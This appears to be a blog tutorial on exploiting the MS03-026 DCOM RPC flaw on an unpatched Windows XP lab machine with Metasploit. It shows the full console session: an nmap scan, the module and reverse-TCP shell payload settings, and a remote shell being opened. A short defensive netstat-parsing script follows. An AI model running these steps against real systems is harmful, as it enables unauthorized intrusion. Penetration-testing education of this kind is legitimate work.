Alexander Mylnikov

31Jan/140

Metasploit: Gaining remote access to Windows XP

No, I have seen a lot, but security blunders like these staying open for such a long time - no, no, no. Please don't do this...

The target system is an old Windows XP system that has no service pack.

The exploit used is dcom ms03_026.

An exploit is like a backdoor found within a program bug. Usually the bug is a buffer overflow that causes a register to be overwritten, and the overwritten register is loaded with the payload you select.

The payload I will use here is reverse TCP binding, also known as a reverse bind shell.

Bind shell – an incoming connection (from the victim machine's point of view) from a malicious remote location that creates a shell.

Reverse bind shell – the opposite: the victim machine establishes a seemingly legitimate connection to the malicious remote location and creates a shell of the victim machine. A reverse bind shell is very effective at evading default firewall settings, because the default firewall setting usually allows everything from the trusted zone to the untrusted zone and blocks unsolicited traffic from the untrusted zone to the trusted zone.

This is a lab setup for learning and practising VA and pentesting; an actual scenario is not as direct as this one.

Understand the target

root@bt:~# nmap -sS -Pn -vvv -O 192.168.20.18

PORT STATE SERVICE
113/tcp open ident
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1026/tcp open LSA-or-nterm
5000/tcp open upnp

OS details: Microsoft Windows 2000 SP0 – SP4 or Windows XP SP0 – SP1

DCOM RPC exploit

msf > search dcom

Matching Modules
================

   Name                                       Disclosure Date  Rank   Description
   ----                                       ---------------  ----   -----------
   exploit/windows/dcerpc/ms03_026_dcom       2003-07-16       great  Microsoft RPC DCOM Interface Overflow
   exploit/windows/driver/broadcom_wifi_ssid  2006-11-11       low    Broadcom Wireless Driver Probe Response SSID Overflow
   exploit/windows/smb/ms04_031_netdde        2004-10-12       good   Microsoft NetDDE Service Overflow

Use the exploit with ranking great.

Use the exploit

msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) >

Understand the options for this exploit

msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  135              yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(ms03_026_dcom) >

RHOST and RPORT are compulsory. The default RPORT is 135, which is the RPC port.

Set the target address

msf exploit(ms03_026_dcom) > set RHOST 192.168.20.18
RHOST => 192.168.20.18

Set payload

An exploit is useless without a payload; the payload is what you want to do to the target victim machine.

msf exploit(ms03_026_dcom) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp

There are several payloads available; for this lab reverse TCP is used.

Show options of the reverse tcp payload

msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.20.18    yes       The target address
   RPORT  135              yes       The target port

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

All options are compulsory. I need to set LHOST, which is my machine, the one the victim machine will connect to.

msf payload(reverse_tcp) > set LHOST 192.168.20.12
LHOST => 192.168.20.12

I can set the EXITFUNC as well; the default is process. I can change it to thread.

msf payload(reverse_tcp) > set EXITFUNC thread
EXITFUNC => thread

I can also set my own LPORT for the victim machine to connect to; the default LPORT is 4444.

msf exploit(ms03_026_dcom) > set LPORT 31337
LPORT => 31337

Exploit and payload configuration at a glance

msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.20.18    yes       The target address
   RPORT  135              yes       The target port

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.20.12    yes       The listen address
   LPORT     31337            yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

Exploit starts

msf exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on 192.168.20.12:31337
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal…
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.20.18[135] …
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.20.18[135] …
[*] Sending exploit …
[*] Sending stage (240 bytes) to 192.168.20.18
[*] Command shell session 1 opened (192.168.20.12:31337 -> 192.168.20.18:3040) at 2012-03-06 01:06:44 +0800

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

A shell is gained.

The user of the victim machine can see a strange connection in netstat.

C:\Documents and Settings\xxx>netstat

Active Connections

Proto Local Address Foreign Address State
TCP xxx:1919 192.168.20.12:4444 CLOSE_WAIT
TCP xxx:3040 192.168.20.12:31337 ESTABLISHED
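
The same check can be automated on the defender's side. The script below is an added example, not part of the original post: it parses netstat output in the format shown above and flags sessions opened from an ephemeral local port to a remote port outside an allow-list. The allow-list (53, 80, 443), the ephemeral threshold and the third sample row are assumptions made for the illustration.

```python
# Added example: triage of `netstat` output for unexpected outbound sessions.
import re

# Assumption: remote ports this workstation is expected to talk to.
EXPECTED_REMOTE_PORTS = {53, 80, 443}
# States that mean a session exists (or existed) with the remote peer.
SESSION_STATES = {"ESTABLISHED", "CLOSE_WAIT"}

# Proto, local host:port, foreign host:port, state
ROW = re.compile(r"^\s*(TCP)\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s*$")

# The two netstat rows from the lab above, plus one constructed benign row.
SAMPLE = """\
Active Connections

  Proto  Local Address   Foreign Address       State
  TCP    xxx:1919        192.168.20.12:4444    CLOSE_WAIT
  TCP    xxx:3040        192.168.20.12:31337   ESTABLISHED
  TCP    xxx:3051        192.168.20.1:80       ESTABLISHED
"""

def parse_netstat(text):
    """Return one dict per TCP row; headers and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            _, _, lport, rhost, rport, state = m.groups()
            rows.append({"local_port": int(lport), "remote_host": rhost,
                         "remote_port": int(rport), "state": state})
    return rows

def suspicious(rows, expected=EXPECTED_REMOTE_PORTS, min_ephemeral=1024):
    """Sessions from an ephemeral local port to an unexpected remote port."""
    return [r for r in rows
            if r["state"] in SESSION_STATES
            and r["local_port"] >= min_ephemeral
            and r["remote_port"] not in expected]

if __name__ == "__main__":
    for r in suspicious(parse_netstat(SAMPLE)):
        print(f'{r["remote_host"]}:{r["remote_port"]} {r["state"]} '
              f'(local port {r["local_port"]})')
```

Both lab sessions to 192.168.20.12 are reported, while the constructed web connection is not.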

I gained a shell, and there are countless things I can do with it. It is very useful to learn PowerShell and the command prompt net and netsh commands.

Final note

The Metasploit framework is actually meant for building and testing exploits, so that security researchers do not need to reinvent the wheel to test the exploits they discover. However, it is also a great tool for pentesting, since it has a huge and frequently updated exploit database.

A simple Windows firewall is sufficient to block this kind of attack, because the default firewall behaviour is to block all unsolicited traffic from the untrusted zone to the trusted zone.
